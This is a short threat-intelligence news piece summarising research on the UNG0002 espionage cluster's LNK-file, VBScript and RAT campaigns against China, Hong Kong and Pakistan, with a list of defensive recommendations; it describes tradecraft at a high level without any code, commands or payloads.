UNG0002 Targets China, Hong Kong, and Pakistan via LNK Files and RATs in Twin Espionage Campaigns

A sophisticated threat activity cluster tracked as UNG0002 (Unknown Group 0002) has been actively targeting multiple sectors across China, Hong Kong, and Pakistan, deploying twin cyber-espionage operations known as Operation Cobalt Whisper and Operation AmberMist.

According to research from Seqrite Labs, this threat actor shows a strong preference for LNK shortcut files, VBScript, and post-exploitation frameworks such as Cobalt Strike and Metasploit, while using CV- or job-themed decoy documents to lure victims.

Technical Analysis and Impact

Operation Cobalt Whisper (May–Sep 2024)
Used spear-phishing emails with malicious ZIP attachments delivering Cobalt Strike beacons via LNK and VBScript payloads. The operation primarily targeted defense, energy, academia, and software development sectors — indicating a focus on intellectual property theft and strategic espionage.

Operation AmberMist (Jan–May 2025)
Delivered INET RAT and Blister DLL loader through malicious LNK files disguised as resumes.
A variant campaign redirected users to fake Pakistan Ministry of Maritime Affairs landing pages, triggering ClickFix-based PowerShell execution that deployed Shadow RAT.

These multi-stage infection chains demonstrate modular design and persistence, allowing attackers to establish C2 communications, exfiltrate sensitive data, and execute arbitrary commands on compromised hosts.

While attribution remains uncertain, technical overlap suggests a Southeast Asian espionage-driven APT with strong operational consistency and evolving tradecraft.

Mitigation and Defense Recommendations

Organizations across the region should take immediate action to strengthen defenses against UNG0002’s attack techniques:
1.Restrict execution of LNK and VBScript files from untrusted sources.
2. Enhance email security filtering to block spear-phishing attachments and spoofed landing pages.
3. Monitor PowerShell activity for unusual command-line executions (e.g., ClickFix or encoded payloads).
4. Deploy EDR/XDR tools capable of detecting RAT-based persistence and Cobalt Strike beacon behaviors.
5. Apply network segmentation and DNS filtering to prevent lateral movement and outbound C2 communications.

UNG0002 exemplifies the continued evolution of state-linked cyber-espionage in Asia — leveraging simple delivery mechanisms with complex post-exploitation frameworks. Organizations must stay vigilant, patch regularly, and implement layered defense strategies to mitigate evolving threats.